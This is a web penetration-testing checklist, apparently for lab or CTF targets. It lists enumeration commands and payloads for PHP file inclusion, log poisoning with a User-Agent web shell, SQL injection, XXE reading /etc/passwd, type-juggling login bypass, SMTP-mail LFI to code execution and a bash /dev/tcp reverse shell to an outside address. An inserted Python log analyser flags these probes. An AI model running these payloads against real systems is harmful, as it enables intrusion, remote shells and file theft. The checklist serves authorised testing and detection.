General Check List
Initial Steps
- Security headers check: securityheaders.com
- SSL cipher strength:
nmap --script=ssl-enum-ciphers -p443 <domain>
- Check the login JavaScript if it is accessible and look for OWASP Top 10 weaknesses. A client-side Cookies.set("name", "value") is a typical one: just set the cookie to any value and refresh the page.
With Unprivileged User Account
- Check what the user can do, what they can access, and what they can change.
OWASP's Guide
- Follow OWASP's testing guide (OWASP Check List Portal).
HeartBleed
If the target runs an old Linux release, like Ubuntu Precise (released in 2012-2014), check for Heartbleed.
# check with nmap
nmap --script vuln <target>
# check with sslyze
sslyze --heartbleed <target>
Enumeration
BurpSuite: Target > Site map
Dirbuster:
dirbuster -u <URL> -v -e <extensions> -l <wordlist> -r <report-location>
Gobuster:
gobuster dir -u <URL> -v -t <threads> -w <wordlist> -x php,txt,bak
gobuster dns -d <domain> -v -t <threads> -w <wordlist>
Dirsearch:
dirsearch.py -u <URL> -e <extensions> -t <threads> -c <cookies> --proxy=<proxy>
Wfuzz:
wfuzz -c -v --hc <status-code> -w <wordlist> <URL>/FUZZ/*
PHP Info Page
Check the phpinfo page to see whether file upload is enabled.
PHP Filter
If there is a file inclusion, read the source of the included file with the php://filter wrapper:
GET /example.php?file=php://filter/convert.base64-encode/resource=<file>
PHP Remote File Inclusion
GET /example.php?file=http://ip/file
GET /example.php?file=ftp://ip/file
GET /example.php?file=expect://ip/file
PHP Log Poisoning
Apache keeps two log files, httpd-access.log and httpd-error.log. The access log records every request, including the User-Agent header, so a User-Agent containing PHP code ends up in the log file and is executed when that file is included through a file inclusion.
User-Agent: <?php system($_REQUEST['ce']); ?>
Wpscan
wpscan --rua -e ap --url <URL> --passwords <passfile>
Other Tools
Foothold
Identity Brute Forcing
- Feature: URL contains parameters used for user role identification
- Example: http://example.com/admin.php?content=Billing&id=1
- Handle: BurpSuite Sniper attack
SQL Injection - URL
- Feature: URL with query parameters attached, and you have a cookie from the site
- Example: http://example.com/index.php?search=something
- Handle:
sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=73jv7pdmjsv7dsspoqtnlv66ls"
sqlmap -r <req-file> -p pass --dbms mysql --level 4 --risk 3
SQL Injection - Web Form
- Feature: Query does not filter user input
- Example: Insert a single or double quote; if the page errors or behaves differently, it is vulnerable to SQL injection
- Handle:
'or''=''--
Directory Traversal
- Feature: Access to any file the web server user has permission to read on the machine
- Example: http://example.com/index.php?file=../../../../etc/passwd
- Handle: Upload a reverse shell and execute it
XXE Injection
- Feature: Arbitrary entities can be injected into an XML POST body
- Example:
<?xml version="1.0" ?><tag></tag>
- Handle:
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><tag>&xxe;</tag>
Type Juggling
- Feature: Misuse of the strcmp() function together with the loose == operator, causing a login bypass
- Example:
strcmp($password, $_POST['password']) == 0
- Handle: Intercept the request and change the username and password into arrays:
username[]=test&password[]=test
LFI
If port 25 is open, connect to it and send an email containing PHP code to a local service user, then include that user's mailbox through the LFI to get code execution.
telnet ip 25
EHLO example.local.domain
VRFY user-on-server@localhost
mail from:whatever-email-addr
rcpt to:user-on-server@localhost
data
<?php echo system($_REQUEST['ce']); ?>
.
quit
LFI include ../../../../../../var/html/mail/<user>&action?ce=whoami
Then put something like bash -i >& /dev/tcp/10.10.15.5/9999 0>&1 in the ce parameter; don't forget to URL-encode it with Ctrl-U if you are in Burp.
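Defender-side counterpart to the log poisoning, PHP wrapper and remote inclusion, directory traversal, type juggling and SQL injection probes listed above: an added example, not part of the original checklist, that parses Apache combined-format access log lines and flags the request patterns this page describes. The log lines, addresses and rule names are constructed for the example.

```python
import re
from urllib.parse import unquote

# Apache combined log format (httpd-access.log):
# ip ident user [time] "METHOD path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# One rule per technique on this page; each is checked against the URL-decoded path and user agent.
RULES = [
    ("log_poisoning_ua", lambda path, ua: "<?php" in ua.lower()),
    ("php_wrapper_inclusion", lambda path, ua: any(w in path.lower() for w in ("php://filter", "expect://"))),
    ("remote_file_inclusion", lambda path, ua: re.search(r"[?&]\w+=(https?|ftp)://", path, re.I) is not None),
    ("directory_traversal", lambda path, ua: "../" in path or "..\\" in path),
    ("array_param_type_juggling", lambda path, ua: re.search(r"[?&]\w+\[\]=", path) is not None),
    ("sqli_quote_probe", lambda path, ua: re.search(r"[?&]\w+='", path) is not None),
]

def analyse_line(line):
    """Parse one access-log line; return (fields, [names of rules that fired]) or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = unquote(m.group("path"))  # decode %2e%2e%2f, %27 etc. before matching
    ua = unquote(m.group("ua"))
    return m.groupdict(), [name for name, check in RULES if check(path, ua)]

def scan(lines):
    """Yield (client ip, raw request path, rule hits) for each line that fires at least one rule."""
    for line in lines:
        parsed = analyse_line(line)
        if parsed and parsed[1]:
            fields, hits = parsed
            yield fields["ip"], fields["path"], hits

# Constructed sample log lines (RFC 5737 test addresses), not taken from any real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /example.php?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 2048 "-" "curl/7.88"',
    '198.51.100.7 - - [10/Oct/2023:13:56:20 +0000] "GET /example.php?file=../../../../etc/passwd HTTP/1.1" 200 1620 "-" "<?php system($_REQUEST[\'ce\']); ?>"',
    '198.51.100.7 - - [10/Oct/2023:13:57:02 +0000] "POST /login.php?username[]=test&password[]=test HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [10/Oct/2023:13:58:11 +0000] "GET /index.php?search=%27or%27%27=%27%27-- HTTP/1.1" 200 800 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, hits in scan(SAMPLE_LOG):
        print(f"{ip} {path} -> {', '.join(hits)}")
```

Feed it a real access log with `scan(open(path))` and review the flagged client addresses; the rules deliberately decode the path first so percent-encoded variants of the same probes are caught.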
WP Admin Shell Upload
- Feature: Admin account and password obtained
- Handle: Metasploit wp_admin_shell_upload module